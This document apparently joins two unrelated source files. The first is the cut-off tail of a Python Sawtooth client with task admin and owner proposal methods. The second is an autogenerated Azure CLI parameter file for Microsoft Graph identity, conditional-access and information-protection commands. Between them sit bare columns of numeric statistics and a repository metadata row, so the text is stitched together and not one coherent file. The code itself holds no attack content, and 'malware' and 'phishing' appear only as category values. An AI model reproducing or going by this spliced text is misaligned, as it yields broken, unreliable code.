return self._client.get_statuses([signature], wait=10)
def reject_add_task_admins(self,
key,
proposal_id,
task_id,
user_id,
reason):
batch_list, signature = task_transaction_creation.reject_add_task_admins(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_add_task_owners(self,
key,
proposal_id,
task_id,
user_id,
reason,
metadata):
batch_list, signature = task_transaction_creation.propose_add_task_owner(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason,
metadata=metadata)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def confirm_add_task_owners(self,
key,
proposal_id,
task_id,
user_id,
reason):
batch_list, signature = task_transaction_creation.confirm_add_task_owners(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def reject_add_task_owners(self,
key,
proposal_id,
task_id,
user_id,
reason):
batch_list, signature = task_transaction_creation.reject_add_task_owners(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_delete_task_admins(self,
key,
proposal_id,
task_id,
user_id,
reason,
metadata):
batch_list, signature = task_transaction_creation.propose_remove_task_admins(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason,
metadata=metadata)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_delete_task_owners(self,
key,
proposal_id,
task_id,
user_id,
reason,
metadata):
batch_list, signature = task_transaction_creation.propose_remove_task_owners(
txn_key=key,
batch_key=BATCHER_KEY,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason,
metadata=metadata)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def make_key_and_name():
context = sawtooth_signing.create_context('secp256k1')
private_key = context.new_random_private_key()
pubkey = context.get_public_key(private_key)
key = Key(public_key=pubkey.as_hex(), private_key=private_key.as_hex())
return key, uuid4().hex
| 35.841769
| 90
| 0.512067
| 8,126
| 78,601
| 4.705636
| 0.04221
| 0.063811
| 0.061117
| 0.080417
| 0.837361
| 0.820885
| 0.788509
| 0.773707
| 0.760918
| 0.750275
| 0
| 0.020644
| 0.39974
| 78,601
| 2,192
| 91
| 35.85812
| 0.789809
| 0.116055
| 0
| 0.847214
| 0
| 0
| 0.071095
| 0
| 0
| 0
| 0
| 0
| 0.074895
| 1
| 0.034751
| false
| 0
| 0.011384
| 0
| 0.065309
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
106e80a932b1acd6b64965a70b016ff30ceac04e
| 170,378
|
py
|
Python
|
msgraph-cli-extensions/beta/identitysignins_beta/azext_identitysignins_beta/generated/_params.py
|
thewahome/msgraph-cli
|
33127d9efa23a0e5f5303c93242fbdbb73348671
|
[
"MIT"
] | null | null | null |
msgraph-cli-extensions/beta/identitysignins_beta/azext_identitysignins_beta/generated/_params.py
|
thewahome/msgraph-cli
|
33127d9efa23a0e5f5303c93242fbdbb73348671
|
[
"MIT"
] | null | null | null |
msgraph-cli-extensions/beta/identitysignins_beta/azext_identitysignins_beta/generated/_params.py
|
thewahome/msgraph-cli
|
33127d9efa23a0e5f5303c93242fbdbb73348671
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=line-too-long
# pylint: disable=too-many-lines
# pylint: disable=too-many-statements
from msgraph.cli.core.commands.parameters import (
get_three_state_flag,
get_enum_type
)
from msgraph.cli.core.commands.validators import validate_file_or_dict
from azext_identitysignins_beta.action import (
AddNamedLocations,
AddGrantControls,
AddApplicationEnforcedRestrictions,
AddCloudAppSecurity,
AddPersistentBrowser,
AddSignInFrequency,
AddApplications,
AddClientApplications,
AddDevices,
AddDeviceStates,
AddLocations,
AddPlatforms,
AddUsers,
AddDataLossPreventionPolicies,
AddSensitivityPolicySettings,
AddAssignedPolicies,
AddAutoLabeling,
AddLabelActions,
AddResults,
AddApplication,
AddClassifyText,
AddNotificationInfo,
AddCurrentLabel,
AddDowngradeJustification,
AddExtendedProperties,
AddMetadata,
AddClassificationResults,
AddB2CAuthenticationMethodsPolicy,
AddActivityBasedTimeoutPolicies,
AddClaimsMappingPolicies,
AddHomeRealmDiscoveryPolicies,
AddPrivateLinkResourcePolicies,
AddTokenIssuancePolicies,
AddTokenLifetimePolicies,
AddIdentitySecurityDefaultsEnforcementPolicy,
AddApplyActions,
AddReviewers,
AddAppliesTo,
AddDefaultUserRolePermissions,
AddExcludes,
AddIncludes,
AddGeoCoordinates,
AddActivity,
AddPolicies,
AddKeys,
AddEmailMethods,
AddFido2Methods,
AddMethods,
AddMicrosoftAuthenticatorMethods,
AddOathMethods,
AddOperations,
AddPasswordlessMicrosoftAuthenticatorMethods,
AddPasswordMethods,
AddPhoneMethods,
AddSecurityQuestionMethods,
AddTemporaryAccessPassMethods
)
def load_arguments(self, _):
with self.argument_context('identitysignins data-policy-operation-data-policy-operation create-data-policy-operation') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('completed_date_time', help='Represents when the request for this data policy operation was '
'completed, in UTC time, using the ISO 8601 format. For example, midnight UTC on Jan 1, 2014 would '
'look like this: \'2014-01-01T00:00:00Z\'. Null until the operation completes.')
c.argument('progress', type=float, help='Specifies the progress of an operation.')
c.argument('status', arg_type=get_enum_type(['notStarted', 'running', 'complete', 'failed',
'unknownFutureValue']), help='')
c.argument('storage_location', type=str, help='The URL location to where data is being exported for export '
'requests.')
c.argument('submitted_date_time', help='Represents when the request for this data operation was submitted, in '
'UTC time, using the ISO 8601 format. For example, midnight UTC on Jan 1, 2014 would look like '
'this: \'2014-01-01T00:00:00Z\'')
c.argument('user_id', type=str, help='The id for the user on whom the operation is performed.')
with self.argument_context('identitysignins data-policy-operation-data-policy-operation delete-data-policy-operation') as c:
c.argument('data_policy_operation_id', type=str, help='key: id of dataPolicyOperation')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins data-policy-operation-data-policy-operation list-data-policy-operation') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins data-policy-operation-data-policy-operation show-data-policy-operation') as c:
c.argument('data_policy_operation_id', type=str, help='key: id of dataPolicyOperation')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins data-policy-operation-data-policy-operation update-data-policy-operation') as c:
c.argument('data_policy_operation_id', type=str, help='key: id of dataPolicyOperation')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('completed_date_time', help='Represents when the request for this data policy operation was '
'completed, in UTC time, using the ISO 8601 format. For example, midnight UTC on Jan 1, 2014 would '
'look like this: \'2014-01-01T00:00:00Z\'. Null until the operation completes.')
c.argument('progress', type=float, help='Specifies the progress of an operation.')
c.argument('status', arg_type=get_enum_type(['notStarted', 'running', 'complete', 'failed',
'unknownFutureValue']), help='')
c.argument('storage_location', type=str, help='The URL location to where data is being exported for export '
'requests.')
c.argument('submitted_date_time', help='Represents when the request for this data operation was submitted, in '
'UTC time, using the ISO 8601 format. For example, midnight UTC on Jan 1, 2014 would look like '
'this: \'2014-01-01T00:00:00Z\'')
c.argument('user_id', type=str, help='The id for the user on whom the operation is performed.')
with self.argument_context('identitysignins identity create-user-flow') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('user_flow_type', arg_type=get_enum_type(['signUp', 'signIn', 'signUpOrSignIn', 'passwordReset',
'profileUpdate', 'resourceOwner', 'unknownFutureValue']),
help='')
c.argument('user_flow_type_version', type=float, help='')
with self.argument_context('identitysignins identity delete-conditional-access') as c:
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins identity delete-user-flow') as c:
c.argument('identity_user_flow_id', type=str, help='key: id of identityUserFlow')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins identity list-user-flow') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins identity show-conditional-access') as c:
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins identity show-user-flow') as c:
c.argument('identity_user_flow_id', type=str, help='key: id of identityUserFlow')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins identity update-conditional-access') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('named_locations', action=AddNamedLocations, nargs='+', help='')
c.argument('policies', type=validate_file_or_dict, help=' Expected value: json-string/@json-file.')
with self.argument_context('identitysignins identity update-user-flow') as c:
c.argument('identity_user_flow_id', type=str, help='key: id of identityUserFlow')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('user_flow_type', arg_type=get_enum_type(['signUp', 'signIn', 'signUpOrSignIn', 'passwordReset',
'profileUpdate', 'resourceOwner', 'unknownFutureValue']),
help='')
c.argument('user_flow_type_version', type=float, help='')
with self.argument_context('identitysignins identity-conditional-access create-named-location') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('created_date_time', help='The Timestamp type represents creation date and time of the location '
'using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would '
'look like this: \'2014-01-01T00:00:00Z\'. Read-only.')
c.argument('display_name', type=str, help='Human-readable name of the location.')
c.argument('modified_date_time', help='The Timestamp type represents last modified date and time of the '
'location using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 '
'would look like this: \'2014-01-01T00:00:00Z\'. Read-only.')
with self.argument_context('identitysignins identity-conditional-access create-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'. Readonly.')
c.argument('description', type=str, help='')
c.argument('display_name', type=str, help='Specifies a display name for the conditionalAccessPolicy object.')
c.argument('grant_controls', action=AddGrantControls, nargs='+', help='conditionalAccessGrantControls')
c.argument('modified_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'. Readonly.')
c.argument('state', arg_type=get_enum_type(['enabled', 'disabled', 'enabledForReportingButNotEnforced']),
help='')
c.argument('application_enforced_restrictions', action=AddApplicationEnforcedRestrictions, nargs='+',
help='applicationEnforcedRestrictionsSessionControl', arg_group='Session Controls')
c.argument('cloud_app_security', action=AddCloudAppSecurity, nargs='+', help='cloudAppSecuritySessionControl',
arg_group='Session Controls')
c.argument('persistent_browser', action=AddPersistentBrowser, nargs='+',
help='persistentBrowserSessionControl', arg_group='Session Controls')
c.argument('sign_in_frequency', action=AddSignInFrequency, nargs='+', help='signInFrequencySessionControl',
arg_group='Session Controls')
c.argument('applications', action=AddApplications, nargs='+', help='conditionalAccessApplications',
arg_group='Conditions')
c.argument('client_applications', action=AddClientApplications, nargs='+',
help='conditionalAccessClientApplications', arg_group='Conditions')
c.argument('client_app_types', nargs='+', help='Client application types included in the policy. Possible '
'values are: all, browser, mobileAppsAndDesktopClients, exchangeActiveSync, easSupported, other.',
arg_group='Conditions')
c.argument('devices', action=AddDevices, nargs='+', help='conditionalAccessDevices', arg_group='Conditions')
c.argument('device_states', action=AddDeviceStates, nargs='+', help='conditionalAccessDeviceStates',
arg_group='Conditions')
c.argument('locations', action=AddLocations, nargs='+', help='conditionalAccessLocations',
arg_group='Conditions')
c.argument('platforms', action=AddPlatforms, nargs='+', help='conditionalAccessPlatforms',
arg_group='Conditions')
c.argument('sign_in_risk_levels', nargs='+', help='Risk levels included in the policy. Possible values are: '
'low, medium, high, none.', arg_group='Conditions')
c.argument('user_risk_levels', nargs='+', help='', arg_group='Conditions')
c.argument('users', action=AddUsers, nargs='+', help='conditionalAccessUsers', arg_group='Conditions')
with self.argument_context('identitysignins identity-conditional-access delete-named-location') as c:
c.argument('named_location_id', type=str, help='key: id of namedLocation')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins identity-conditional-access delete-policy') as c:
c.argument('conditional_access_policy_id', type=str, help='key: id of conditionalAccessPolicy')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins identity-conditional-access list-named-location') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins identity-conditional-access list-policy') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins identity-conditional-access show-named-location') as c:
c.argument('named_location_id', type=str, help='key: id of namedLocation')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins identity-conditional-access show-policy') as c:
c.argument('conditional_access_policy_id', type=str, help='key: id of conditionalAccessPolicy')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins identity-conditional-access update-named-location') as c:
c.argument('named_location_id', type=str, help='key: id of namedLocation')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('created_date_time', help='The Timestamp type represents creation date and time of the location '
'using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would '
'look like this: \'2014-01-01T00:00:00Z\'. Read-only.')
c.argument('display_name', type=str, help='Human-readable name of the location.')
c.argument('modified_date_time', help='The Timestamp type represents last modified date and time of the '
'location using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 '
'would look like this: \'2014-01-01T00:00:00Z\'. Read-only.')
with self.argument_context('identitysignins identity-conditional-access update-policy') as c:
c.argument('conditional_access_policy_id', type=str, help='key: id of conditionalAccessPolicy')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'. Readonly.')
c.argument('description', type=str, help='')
c.argument('display_name', type=str, help='Specifies a display name for the conditionalAccessPolicy object.')
c.argument('grant_controls', action=AddGrantControls, nargs='+', help='conditionalAccessGrantControls')
c.argument('modified_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'. Readonly.')
c.argument('state', arg_type=get_enum_type(['enabled', 'disabled', 'enabledForReportingButNotEnforced']),
help='')
c.argument('application_enforced_restrictions', action=AddApplicationEnforcedRestrictions, nargs='+',
help='applicationEnforcedRestrictionsSessionControl', arg_group='Session Controls')
c.argument('cloud_app_security', action=AddCloudAppSecurity, nargs='+', help='cloudAppSecuritySessionControl',
arg_group='Session Controls')
c.argument('persistent_browser', action=AddPersistentBrowser, nargs='+',
help='persistentBrowserSessionControl', arg_group='Session Controls')
c.argument('sign_in_frequency', action=AddSignInFrequency, nargs='+', help='signInFrequencySessionControl',
arg_group='Session Controls')
c.argument('applications', action=AddApplications, nargs='+', help='conditionalAccessApplications',
arg_group='Conditions')
c.argument('client_applications', action=AddClientApplications, nargs='+',
help='conditionalAccessClientApplications', arg_group='Conditions')
c.argument('client_app_types', nargs='+', help='Client application types included in the policy. Possible '
'values are: all, browser, mobileAppsAndDesktopClients, exchangeActiveSync, easSupported, other.',
arg_group='Conditions')
c.argument('devices', action=AddDevices, nargs='+', help='conditionalAccessDevices', arg_group='Conditions')
c.argument('device_states', action=AddDeviceStates, nargs='+', help='conditionalAccessDeviceStates',
arg_group='Conditions')
c.argument('locations', action=AddLocations, nargs='+', help='conditionalAccessLocations',
arg_group='Conditions')
c.argument('platforms', action=AddPlatforms, nargs='+', help='conditionalAccessPlatforms',
arg_group='Conditions')
c.argument('sign_in_risk_levels', nargs='+', help='Risk levels included in the policy. Possible values are: '
'low, medium, high, none.', arg_group='Conditions')
c.argument('user_risk_levels', nargs='+', help='', arg_group='Conditions')
c.argument('users', action=AddUsers, nargs='+', help='conditionalAccessUsers', arg_group='Conditions')
with self.argument_context('identitysignins identity-provider-identity-provider create-identity-provider') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('client_id', type=str, help='')
c.argument('client_secret', type=str, help='')
c.argument('name', type=str, help='')
c.argument('type_', options_list=['--type'], type=str, help='')
with self.argument_context('identitysignins identity-provider-identity-provider delete-identity-provider') as c:
c.argument('identity_provider_id', type=str, help='key: id of identityProvider')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins identity-provider-identity-provider list-identity-provider') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins identity-provider-identity-provider show-identity-provider') as c:
c.argument('identity_provider_id', type=str, help='key: id of identityProvider')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins identity-provider-identity-provider update-identity-provider') as c:
c.argument('identity_provider_id', type=str, help='key: id of identityProvider')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('client_id', type=str, help='')
c.argument('client_secret', type=str, help='')
c.argument('name', type=str, help='')
c.argument('type_', options_list=['--type'], type=str, help='')
with self.argument_context('identitysignins information-protection-information-protection show-information-protection') as c:
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection-information-protection update-information-protection') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('data_loss_prevention_policies', action=AddDataLossPreventionPolicies, nargs='+', help='')
c.argument('sensitivity_labels', type=validate_file_or_dict, help=' Expected value: json-string/@json-file.')
c.argument('sensitivity_policy_settings', action=AddSensitivityPolicySettings, nargs='+',
help='sensitivityPolicySettings')
c.argument('threat_assessment_requests', type=validate_file_or_dict, help=' Expected value: '
'json-string/@json-file.')
c.argument('microsoft_graph_entity_id', type=str, help='Read-only.', arg_group='Policy')
c.argument('labels', type=validate_file_or_dict, help=' Expected value: json-string/@json-file.',
arg_group='Policy')
with self.argument_context('identitysignins information-protection create-data-loss-prevention-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('name', type=str, help='')
with self.argument_context('identitysignins information-protection create-sensitivity-label') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('applicable_to', arg_type=get_enum_type(['email', 'site', 'unifiedGroup', 'unknownFutureValue']),
help='')
c.argument('application_mode', arg_type=get_enum_type(['manual', 'automatic', 'recommended']), help='')
c.argument('assigned_policies', action=AddAssignedPolicies, nargs='+', help='')
c.argument('auto_labeling', action=AddAutoLabeling, nargs='+', help='autoLabeling')
c.argument('description', type=str, help='')
c.argument('display_name', type=str, help='')
c.argument('is_default', arg_type=get_three_state_flag(), help='')
c.argument('is_endpoint_protection_enabled', arg_type=get_three_state_flag(), help='')
c.argument('label_actions', action=AddLabelActions, nargs='+', help='')
c.argument('name', type=str, help='')
c.argument('priority', type=int, help='')
c.argument('tool_tip', type=str, help='')
c.argument('sublabels', type=validate_file_or_dict, help=' Expected value: json-string/@json-file.')
with self.argument_context('identitysignins information-protection create-threat-assessment-request') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('category', arg_type=get_enum_type(['undefined', 'spam', 'phishing', 'malware',
'unknownFutureValue']), help='')
c.argument('content_type', arg_type=get_enum_type(['mail', 'url', 'file']), help='')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'.')
c.argument('expected_assessment', arg_type=get_enum_type(['block', 'unblock']), help='')
c.argument('request_source', arg_type=get_enum_type(['undefined', 'user', 'administrator']), help='')
c.argument('status', arg_type=get_enum_type(['pending', 'completed']), help='')
c.argument('results', action=AddResults, nargs='+', help='A collection of threat assessment results. '
'Read-only. By default, a GET /threatAssessmentRequests/{id} does not return this property unless '
'you apply $expand on it.')
c.argument('application', action=AddApplication, nargs='+', help='identity', arg_group='Created By')
c.argument('device', action=AddApplication, nargs='+', help='identity', arg_group='Created By')
c.argument('user', action=AddApplication, nargs='+', help='identity', arg_group='Created By')
with self.argument_context('identitysignins information-protection delete-data-loss-prevention-policy') as c:
c.argument('data_loss_prevention_policy_id', type=str, help='key: id of dataLossPreventionPolicy')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins information-protection delete-policy') as c:
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins information-protection delete-sensitivity-label') as c:
c.argument('sensitivity_label_id', type=str, help='key: id of sensitivityLabel')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins information-protection delete-sensitivity-policy-setting') as c:
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins information-protection delete-threat-assessment-request') as c:
c.argument('threat_assessment_request_id', type=str, help='key: id of threatAssessmentRequest')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins information-protection evaluate-label-and-policy') as c:
c.argument('classify_text', action=AddClassifyText, nargs='+', help='textClassificationRequest')
c.argument('evaluation_input', type=validate_file_or_dict, help='dlpEvaluationInput Expected value: '
'json-string/@json-file.', arg_group='Evaluate Data Loss Prevention Policies')
c.argument('notification_info', action=AddNotificationInfo, nargs='+', help='dlpNotification',
arg_group='Evaluate Data Loss Prevention Policies')
c.argument('target', type=str, help='', arg_group='Evaluate Data Loss Prevention Policies')
c.argument('current_label', action=AddCurrentLabel, nargs='+', help='currentLabel', arg_group='Evaluate '
'Sensitivity Labels')
c.argument('discovered_sensitive_types', type=validate_file_or_dict, help=' Expected value: '
'json-string/@json-file.', arg_group='Evaluate Sensitivity Labels')
with self.argument_context('identitysignins information-protection list-data-loss-prevention-policy') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection list-sensitivity-label') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection list-threat-assessment-request') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection show-data-loss-prevention-policy') as c:
c.argument('data_loss_prevention_policy_id', type=str, help='key: id of dataLossPreventionPolicy')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection show-policy') as c:
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection show-sensitivity-label') as c:
c.argument('sensitivity_label_id', type=str, help='key: id of sensitivityLabel')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection show-sensitivity-policy-setting') as c:
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection show-threat-assessment-request') as c:
c.argument('threat_assessment_request_id', type=str, help='key: id of threatAssessmentRequest')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection update-data-loss-prevention-policy') as c:
c.argument('data_loss_prevention_policy_id', type=str, help='key: id of dataLossPreventionPolicy')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('name', type=str, help='')
with self.argument_context('identitysignins information-protection update-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('labels', type=validate_file_or_dict, help=' Expected value: json-string/@json-file.')
with self.argument_context('identitysignins information-protection update-sensitivity-label') as c:
c.argument('sensitivity_label_id', type=str, help='key: id of sensitivityLabel')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('applicable_to', arg_type=get_enum_type(['email', 'site', 'unifiedGroup', 'unknownFutureValue']),
help='')
c.argument('application_mode', arg_type=get_enum_type(['manual', 'automatic', 'recommended']), help='')
c.argument('assigned_policies', action=AddAssignedPolicies, nargs='+', help='')
c.argument('auto_labeling', action=AddAutoLabeling, nargs='+', help='autoLabeling')
c.argument('description', type=str, help='')
c.argument('display_name', type=str, help='')
c.argument('is_default', arg_type=get_three_state_flag(), help='')
c.argument('is_endpoint_protection_enabled', arg_type=get_three_state_flag(), help='')
c.argument('label_actions', action=AddLabelActions, nargs='+', help='')
c.argument('name', type=str, help='')
c.argument('priority', type=int, help='')
c.argument('tool_tip', type=str, help='')
c.argument('sublabels', type=validate_file_or_dict, help=' Expected value: json-string/@json-file.')
with self.argument_context('identitysignins information-protection update-sensitivity-policy-setting') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('applicable_to', arg_type=get_enum_type(['email', 'site', 'unifiedGroup', 'unknownFutureValue']),
help='')
c.argument('downgrade_sensitivity_requires_justification', arg_type=get_three_state_flag(), help='')
c.argument('help_web_url', type=str, help='')
c.argument('is_mandatory', arg_type=get_three_state_flag(), help='')
with self.argument_context('identitysignins information-protection update-threat-assessment-request') as c:
c.argument('threat_assessment_request_id', type=str, help='key: id of threatAssessmentRequest')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('category', arg_type=get_enum_type(['undefined', 'spam', 'phishing', 'malware',
'unknownFutureValue']), help='')
c.argument('content_type', arg_type=get_enum_type(['mail', 'url', 'file']), help='')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'.')
c.argument('expected_assessment', arg_type=get_enum_type(['block', 'unblock']), help='')
c.argument('request_source', arg_type=get_enum_type(['undefined', 'user', 'administrator']), help='')
c.argument('status', arg_type=get_enum_type(['pending', 'completed']), help='')
c.argument('results', action=AddResults, nargs='+', help='A collection of threat assessment results. '
'Read-only. By default, a GET /threatAssessmentRequests/{id} does not return this property unless '
'you apply $expand on it.')
c.argument('application', action=AddApplication, nargs='+', help='identity', arg_group='Created By')
c.argument('device', action=AddApplication, nargs='+', help='identity', arg_group='Created By')
c.argument('user', action=AddApplication, nargs='+', help='identity', arg_group='Created By')
with self.argument_context('identitysignins information-protection-data-loss-prevention-policy evaluate') as c:
c.argument('target', type=str, help='')
c.argument('author', type=str, help='', arg_group='Notification Info')
c.argument('access_scope', arg_type=get_enum_type(['inOrganization', 'notInOrganization']), help='',
arg_group='Evaluation Input')
c.argument('current_label', action=AddCurrentLabel, nargs='+', help='currentLabel', arg_group='Evaluation '
'Input')
c.argument('discovered_sensitive_types', type=validate_file_or_dict, help=' Expected value: '
'json-string/@json-file.', arg_group='Evaluation Input')
with self.argument_context('identitysignins information-protection-policy create-label') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('color', type=str, help='')
c.argument('description', type=str, help='')
c.argument('is_active', arg_type=get_three_state_flag(), help='')
c.argument('name', type=str, help='')
c.argument('parent', type=validate_file_or_dict, help='parentLabelDetails Expected value: '
'json-string/@json-file.')
c.argument('sensitivity', type=int, help='')
c.argument('tooltip', type=str, help='')
with self.argument_context('identitysignins information-protection-policy delete-label') as c:
c.argument('information_protection_label_id', type=str, help='key: id of informationProtectionLabel')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins information-protection-policy list-label') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection-policy show-label') as c:
c.argument('information_protection_label_id', type=str, help='key: id of informationProtectionLabel')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection-policy update-label') as c:
c.argument('information_protection_label_id', type=str, help='key: id of informationProtectionLabel')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('color', type=str, help='')
c.argument('description', type=str, help='')
c.argument('is_active', arg_type=get_three_state_flag(), help='')
c.argument('name', type=str, help='')
c.argument('parent', type=validate_file_or_dict, help='parentLabelDetails Expected value: '
'json-string/@json-file.')
c.argument('sensitivity', type=int, help='')
c.argument('tooltip', type=str, help='')
